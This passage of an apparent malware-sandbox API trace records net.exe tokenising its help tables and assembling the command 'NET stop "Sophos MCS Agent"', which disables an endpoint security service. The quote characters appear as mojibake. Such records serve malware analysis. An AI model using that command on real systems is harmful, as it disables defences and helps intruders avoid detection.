returned="\r\nGROUP: GROUPS" [0217.845] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nREPLICATOR: REPL, REPLICATOR" [0217.845] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSESSION: SESSIONS, SESS" [0217.845] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSTATISTICS: STATS" [0217.845] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nUSER: USERS" [0217.845] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR" [0217.845] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSERVER: SVR, SRV" [0217.845] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\n" [0217.845] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0217.845] wcstok (in: _String="CONTINUE: CONT", _Delimiter=":,$", _Context=0x3d6 | out: _String="CONTINUE", _Context=0x3d6) returned="CONTINUE" [0217.845] wcsspn (_String="CONTINUE", _Control="\x09\n\x0b\x0c\r ") returned 0x0 [0217.845] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" CONT" [0217.845] wcsspn (_String=" CONT", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0217.845] _wcsicmp (_String1="CONT", _String2="stop") returned -16 [0217.845] _wcsicmp (_String1="CONT", _String2="ΓÇ£Sophos") returned -848 [0217.845] _wcsicmp (_String1="CONT", _String2="MCS") returned -10 [0217.845] _wcsicmp (_String1="CONT", _String2="AgentΓÇ¥") returned 2 [0217.845] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0217.845] wcstok (in: _String="\r\nFILE: FILES", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nFILE", _Context=0x3d6) returned="\r\nFILE" [0217.845] wcsspn (_String="\r\nFILE", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0217.845] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" FILES" [0217.845] wcsspn (_String=" FILES", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0217.845] _wcsicmp (_String1="FILES", _String2="stop") returned -13 [0217.845] _wcsicmp (_String1="FILES", _String2="ΓÇ£Sophos") returned -845 [0217.845] _wcsicmp (_String1="FILES", _String2="MCS") returned -7 [0217.845] _wcsicmp (_String1="FILES", _String2="AgentΓÇ¥") returned 5 [0217.845] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0217.846] wcstok (in: _String="\r\nGROUP: GROUPS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nGROUP", _Context=0x3d6) returned="\r\nGROUP" [0217.846] wcsspn (_String="\r\nGROUP", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0217.846] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" GROUPS" [0217.846] wcsspn (_String=" GROUPS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0217.846] _wcsicmp (_String1="GROUPS", _String2="stop") returned -12 [0217.846] _wcsicmp (_String1="GROUPS", _String2="ΓÇ£Sophos") returned -844 [0217.846] _wcsicmp (_String1="GROUPS", _String2="MCS") returned -6 [0217.846] _wcsicmp (_String1="GROUPS", _String2="AgentΓÇ¥") returned 6 [0217.846] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0217.846] wcstok (in: _String="\r\nREPLICATOR: REPL, REPLICATOR", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nREPLICATOR", _Context=0x3d6) returned="\r\nREPLICATOR" [0217.846] wcsspn (_String="\r\nREPLICATOR", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0217.846] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REPL" [0217.846] wcsspn (_String=" REPL", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0217.846] _wcsicmp (_String1="REPL", _String2="stop") returned -1 [0217.846] _wcsicmp (_String1="REPL", _String2="ΓÇ£Sophos") returned -833 [0217.846] _wcsicmp (_String1="REPL", _String2="MCS") returned 5 [0217.846] _wcsicmp (_String1="REPL", _String2="AgentΓÇ¥") returned 17 [0217.846] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REPLICATOR" [0217.846] wcsspn (_String=" REPLICATOR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0217.846] _wcsicmp (_String1="REPLICATOR", _String2="stop") returned -1 [0217.846] _wcsicmp (_String1="REPLICATOR", _String2="ΓÇ£Sophos") returned -833 [0217.846] _wcsicmp (_String1="REPLICATOR", _String2="MCS") returned 5 [0217.846] _wcsicmp (_String1="REPLICATOR", _String2="AgentΓÇ¥") returned 17 [0217.846] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0217.846] wcstok (in: _String="\r\nSESSION: SESSIONS, SESS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nSESSION", _Context=0x3d6) returned="\r\nSESSION" [0217.846] wcsspn (_String="\r\nSESSION", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0217.846] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SESSIONS" [0217.846] wcsspn (_String=" SESSIONS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0217.846] _wcsicmp (_String1="SESSIONS", _String2="stop") returned -15 [0217.846] _wcsicmp (_String1="SESSIONS", _String2="ΓÇ£Sophos") returned -832 [0217.846] _wcsicmp (_String1="SESSIONS", _String2="MCS") returned 6 [0217.846] _wcsicmp (_String1="SESSIONS", _String2="AgentΓÇ¥") returned 18 [0217.846] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SESS" [0217.846] wcsspn (_String=" SESS", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0217.846] _wcsicmp (_String1="SESS", _String2="stop") returned -15 [0217.847] _wcsicmp (_String1="SESS", _String2="ΓÇ£Sophos") returned -832 [0217.847] _wcsicmp (_String1="SESS", _String2="MCS") returned 6 [0217.847] _wcsicmp (_String1="SESS", _String2="AgentΓÇ¥") returned 18 [0217.847] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0217.847] wcstok (in: _String="\r\nSTATISTICS: STATS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nSTATISTICS", _Context=0x3d6) returned="\r\nSTATISTICS" [0217.847] wcsspn (_String="\r\nSTATISTICS", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0217.847] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" STATS" [0217.847] wcsspn (_String=" STATS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0217.847] _wcsicmp (_String1="STATS", _String2="stop") returned -14 [0217.847] _wcsicmp (_String1="STATS", _String2="ΓÇ£Sophos") returned -832 [0217.847] _wcsicmp (_String1="STATS", _String2="MCS") returned 6 [0217.847] _wcsicmp (_String1="STATS", _String2="AgentΓÇ¥") returned 18 [0217.847] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0217.847] wcstok (in: _String="\r\nUSER: USERS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nUSER", _Context=0x3d6) returned="\r\nUSER" [0217.847] wcsspn (_String="\r\nUSER", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0217.847] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" USERS" [0217.847] wcsspn (_String=" USERS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0217.847] _wcsicmp (_String1="USERS", _String2="stop") returned 2 [0217.847] _wcsicmp (_String1="USERS", _String2="ΓÇ£Sophos") returned -830 [0217.847] _wcsicmp (_String1="USERS", _String2="MCS") returned 8 [0217.847] _wcsicmp (_String1="USERS", _String2="AgentΓÇ¥") returned 20 [0217.847] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0217.847] wcstok (in: _String="\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nWORKSTATION", _Context=0x3d6) returned="\r\nWORKSTATION" [0217.847] wcsspn (_String="\r\nWORKSTATION", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0217.847] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REDIRECTOR" [0217.847] wcsspn (_String=" REDIRECTOR", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0217.847] _wcsicmp (_String1="REDIRECTOR", _String2="stop") returned -1 [0217.847] _wcsicmp (_String1="REDIRECTOR", _String2="ΓÇ£Sophos") returned -833 [0217.847] _wcsicmp (_String1="REDIRECTOR", _String2="MCS") returned 5 [0217.847] _wcsicmp (_String1="REDIRECTOR", _String2="AgentΓÇ¥") returned 17 [0217.847] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REDIR" [0217.847] wcsspn (_String=" REDIR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0217.847] _wcsicmp (_String1="REDIR", _String2="stop") returned -1 [0217.847] _wcsicmp (_String1="REDIR", _String2="ΓÇ£Sophos") returned -833 [0217.847] _wcsicmp (_String1="REDIR", _String2="MCS") returned 5 [0217.847] _wcsicmp (_String1="REDIR", _String2="AgentΓÇ¥") returned 17 [0217.848] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" RDR" [0217.848] wcsspn (_String=" RDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0217.848] _wcsicmp (_String1="RDR", _String2="stop") returned -1 [0217.848] _wcsicmp (_String1="RDR", _String2="ΓÇ£Sophos") returned -833 [0217.848] _wcsicmp (_String1="RDR", _String2="MCS") returned 5 [0217.848] _wcsicmp (_String1="RDR", _String2="AgentΓÇ¥") returned 17 [0217.848] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" WORK" [0217.848] wcsspn (_String=" WORK", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0217.848] _wcsicmp (_String1="WORK", _String2="stop") returned 4 [0217.848] _wcsicmp (_String1="WORK", _String2="ΓÇ£Sophos") returned -828 [0217.848] _wcsicmp (_String1="WORK", _String2="MCS") returned 10 [0217.848] _wcsicmp (_String1="WORK", _String2="AgentΓÇ¥") returned 22 [0217.848] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" WKSTA" [0217.848] wcsspn (_String=" WKSTA", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0217.848] _wcsicmp (_String1="WKSTA", _String2="stop") returned 4 [0217.848] _wcsicmp (_String1="WKSTA", _String2="ΓÇ£Sophos") returned -828 [0217.848] _wcsicmp (_String1="WKSTA", _String2="MCS") returned 10 [0217.848] _wcsicmp (_String1="WKSTA", _String2="AgentΓÇ¥") returned 22 [0217.848] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" PRDR" [0217.848] wcsspn (_String=" PRDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0217.848] _wcsicmp (_String1="PRDR", _String2="stop") returned -3 [0217.848] _wcsicmp (_String1="PRDR", _String2="ΓÇ£Sophos") returned -835 [0217.848] _wcsicmp (_String1="PRDR", _String2="MCS") returned 3 [0217.848] _wcsicmp (_String1="PRDR", _String2="AgentΓÇ¥") returned 15 [0217.848] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" DEVRDR" [0217.848] wcsspn (_String=" DEVRDR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0217.848] _wcsicmp (_String1="DEVRDR", _String2="stop") returned -15 [0217.848] _wcsicmp (_String1="DEVRDR", _String2="ΓÇ£Sophos") returned -847 [0217.848] _wcsicmp (_String1="DEVRDR", _String2="MCS") returned -9 [0217.848] _wcsicmp (_String1="DEVRDR", _String2="AgentΓÇ¥") returned 3 [0217.848] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0217.848] wcstok (in: _String="\r\nSERVER: SVR, SRV", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nSERVER", _Context=0x3d6) returned="\r\nSERVER" [0217.848] wcsspn (_String="\r\nSERVER", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0217.848] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SVR" [0217.848] wcsspn (_String=" SVR", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0217.848] _wcsicmp (_String1="SVR", _String2="stop") returned 2 [0217.849] _wcsicmp (_String1="SVR", _String2="ΓÇ£Sophos") returned -832 [0217.849] _wcsicmp (_String1="SVR", _String2="MCS") returned 6 [0217.849] _wcsicmp (_String1="SVR", _String2="AgentΓÇ¥") returned 18 [0217.849] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SRV" [0217.849] wcsspn (_String=" SRV", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0217.849] _wcsicmp (_String1="SRV", _String2="stop") returned -2 [0217.849] _wcsicmp (_String1="SRV", _String2="ΓÇ£Sophos") returned -832 [0217.849] _wcsicmp (_String1="SRV", _String2="MCS") returned 6 [0217.849] _wcsicmp (_String1="SRV", _String2="AgentΓÇ¥") returned 18 [0217.849] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0217.849] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc67, dwLanguageId=0x0, lpBuffer=0x1cf288, nSize=0x0, Arguments=0x1cf284 | out: lpBuffer="嗘`ꔺ瓡") returned 0x1c [0217.849] wcstok (in: _String="NAMES$\r\nSYNTAX$\r\nSERVICES$\r\n", _Delimiter="$", _Context=0x3d6 | out: _String="NAMES", _Context=0x3d6) returned="NAMES" [0217.849] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSYNTAX" [0217.849] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSERVICES" [0217.849] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\n" [0217.849] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0217.849] wcsspn (_String="NAMES", _Control="\x09\n\x0b\x0c\r ") returned 0x0 [0217.849] _wcsicmp (_String1="stop", _String2="NAMES") returned 5 [0217.849] wcsspn (_String="\r\nSYNTAX", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0217.849] _wcsicmp (_String1="stop", _String2="SYNTAX") returned -5 [0217.849] wcsspn (_String="\r\nSERVICES", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0217.849] _wcsicmp (_String1="stop", _String2="SERVICES") returned 15 [0217.849] wcscpy_s (in: _Destination=0x9ea4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0217.849] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a00000 [0217.850] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a00000, dwMessageId=0x111d, dwLanguageId=0x0, lpBuffer=0x9eb338, nSize=0x800, Arguments=0x9e9dd8 | out: lpBuffer="The syntax of this command is:\r\n") returned 0x20 [0217.851] GetFileType (hFile=0x26c) returned 0x3 [0217.851] LocalAlloc (uFlags=0x0, uBytes=0x40) returned 0x603c10 [0217.851] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The syntax of this command is:\r\n", cchWideChar=32, lpMultiByteStr=0x603c10, cbMultiByte=64, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The syntax of this command is:\r\n", lpUsedDefaultChar=0x0) returned 32 [0217.851] WriteFile (in: hFile=0x26c, lpBuffer=0x603c10, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cf268, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1cf268, lpOverlapped=0x0) returned 0 [0217.851] LocalFree (hMem=0x603c10) returned 0x0 [0217.851] GetFileType (hFile=0x26c) returned 0x3 [0217.851] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x603918 [0217.851] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x603918, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n`", lpUsedDefaultChar=0x0) returned 2 [0217.851] WriteFile (in: hFile=0x26c, lpBuffer=0x603918, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1cf268, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1cf268, lpOverlapped=0x0) returned 0 [0217.851] LocalFree (hMem=0x603918) returned 0x0 [0217.851] wcscpy_s (in: _Destination=0x1cf320, _SizeInWords=0x200, _Source="NET" | out: _Destination="NET") returned 0x0 [0217.851] wcsncat_s (in: _Destination="NET", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET ") returned 0x0 [0217.851] wcsncat_s (in: _Destination="NET ", _SizeInWords=0x200, _Source="stop", _MaxCount=0xffffffff | out: _Destination="NET stop") returned 0x0 [0217.851] wcsncat_s (in: _Destination="NET stop", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop ") returned 0x0 [0217.851] wcsncat_s (in: _Destination="NET stop ", _SizeInWords=0x200, _Source="ΓÇ£Sophos", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£Sophos") returned 0x0 [0217.851] wcsncat_s (in: _Destination="NET stop ΓÇ£Sophos", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£Sophos ") returned 0x0 [0217.851] wcsncat_s (in: _Destination="NET stop ΓÇ£Sophos ", _SizeInWords=0x200, _Source="MCS", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£Sophos MCS") returned 0x0 [0217.851] wcsncat_s (in: _Destination="NET stop ΓÇ£Sophos MCS", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£Sophos MCS ") returned 0x0 [0217.851] wcsncat_s (in: _Destination="NET stop ΓÇ£Sophos MCS ", _SizeInWords=0x200, _Source="AgentΓÇ¥", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£Sophos MCS AgentΓÇ¥") returned 0x0 [0217.851] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="嘠`댸\x9e\x1cѰ\x9eɬ") returned 0xad [0217.851] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS AgentΓÇ¥", _String2="NET ACCOUNTS\r\n[/FORCELOGOFF:{mi", _MaxCount=0x1f) returned 18 [0217.852] LocalFree (hMem=0x605620) returned 0x0 [0217.852] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="嘠`⡋瓢\x1c嘠`\x1c") returned 0x2e [0217.852] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS AgentΓÇ¥", _String2="NET COMPUTER\r\n\\\\computername {/", _MaxCount=0x1f) returned 16 [0217.852] LocalFree (hMem=0x605620) returned 0x0 [0217.852] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="嘠`⡋瓢\x1c嘠`\x1c") returned 0x7d [0217.852] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS AgentΓÇ¥", _String2="NET CONFIG SERVER\r\n[/AUTODISCON", _MaxCount=0x1f) returned 16 [0217.852] LocalFree (hMem=0x605620) returned 0x0 [0217.852] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="嘠`⡋瓢\x1c嘠`\x1c") returned 0x26 [0217.852] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS AgentΓÇ¥", _String2="NET CONFIG\r\n[SERVER | WORKSTATI", _MaxCount=0x1f) returned 16 [0217.852] LocalFree (hMem=0x605620) returned 0x0 [0217.852] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="嘠`⡋瓢\x1c嘠`\x1c") returned 0x19 [0217.852] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS AgentΓÇ¥", _String2="NET CONTINUE\r\nservice\r\n\r\n", _MaxCount=0x1f) returned 16 [0217.852] LocalFree (hMem=0x605620) returned 0x0 [0217.852] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="嘠`⡋瓢\x1c嘠`\x1c") returned 0x1b [0217.852] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS AgentΓÇ¥", _String2="NET FILE\r\n[id [/CLOSE]]\r\n\r\n", _MaxCount=0x1f) returned 13 [0217.852] LocalFree (hMem=0x605620) returned 0x0 [0217.852] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="嘠`⡋瓢\x1c嘠`\x1c") returned 0xbe [0217.852] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS AgentΓÇ¥", _String2="NET GROUP\r\n[groupname [/COMMENT", _MaxCount=0x1f) returned 12 [0217.852] LocalFree (hMem=0x605620) returned 0x0 [0217.852] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="嘠`⡋瓢\x1c嘠`\x1c") returned 0x33 [0217.852] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS AgentΓÇ¥", _String2="NET HELP\r\ncommand\r\n -or-\r\nN", _MaxCount=0x1f) returned 11 [0217.852] LocalFree (hMem=0x605620) returned 0x0 [0217.852] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="嘠`⡋瓢\x1c嘠`\x1c") returned 0x19 [0217.852] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS AgentΓÇ¥", _String2="NET HELPMSG\r\nmessage#\r\n\r\n", _MaxCount=0x1f) returned 11 [0217.852] LocalFree (hMem=0x605620) returned 0x0 [0217.852] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="嘠`⡋瓢\x1c嘠`\x1c") returned 0xc1 [0217.852] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS AgentΓÇ¥", _String2="NET LOCALGROUP\r\n[groupname [/CO", _MaxCount=0x1f) returned 7 [0217.852] LocalFree (hMem=0x605620) returned 0x0 [0217.852] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="嘠`⡋瓢\x1c嘠`\x1c") returned 0x16 [0217.852] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS AgentΓÇ¥", _String2="NET PAUSE\r\nservice\r\n\r\n", _MaxCount=0x1f) returned 3 [0217.852] LocalFree (hMem=0x605620) returned 0x0 [0217.852] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="嘠`⡋瓢\x1c嘠`\x1c") returned 0x33 [0217.852] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS AgentΓÇ¥", _String2="NET SESSION\r\n[\\\\computername] [", _MaxCount=0x1f) returned 15 [0217.852] LocalFree (hMem=0x605620) returned 0x0 [0217.852] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="嘠`⡋瓢\x1c嘠`\x1c") returned 0x234 [0217.853] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS AgentΓÇ¥", _String2="NET SHARE\r\nsharename\r\n ", _MaxCount=0x1f) returned 12 [0217.853] LocalFree (hMem=0x605620) returned 0x0 [0217.853] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="嘠`⡋瓢\x1c嘠`\x1c") returned 0x13 [0217.853] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS AgentΓÇ¥", _String2="NET START BROWSER\r\n", _MaxCount=0x1f) returned 14 [0217.853] LocalFree (hMem=0x605620) returned 0x0 [0217.853] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="嘠`⡋瓢\x1c嘠`\x1c") returned 0x14 [0217.853] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS AgentΓÇ¥", _String2="NET START CLIPBOOK\r\n", _MaxCount=0x1f) returned 14 [0217.853] LocalFree (hMem=0x605620) returned 0x0 [0217.853] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="嘠`⡋瓢\x1c嘠`\x1c") returned 0x14 [0217.853] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS AgentΓÇ¥", _String2="NET START EVENTLOG\r\n", _MaxCount=0x1f) returned 14 [0217.853] LocalFree (hMem=0x605620) returned 0x0 [0217.853] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="嘠`⡋瓢\x1c嘠`\x1c") returned 0x15 [0217.853] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS AgentΓÇ¥", _String2="NET START MESSENGER\r\n", _MaxCount=0x1f) returned 14 [0217.853] LocalFree (hMem=0x605620) returned 0x0 [0217.853] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="嘠`⡋瓢\x1c嘠`\x1c") returned 0x15 [0217.853] _wcsnicmp (_String1="NET stop ΓÇ£Sophos MCS AgentΓÇ¥", _String2="NET START NET LOGON\r\n", _MaxCount=0x1f) returned 14 [0217.853] LocalFree (hMem=0x605620) returned 0x0 [0217.853] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="嘠`⡋瓢\x1c嘠`\x1c") returned 0x16 [0217.853] _wcsnicmp (_String1="NET stop ΓÇ£Sophos 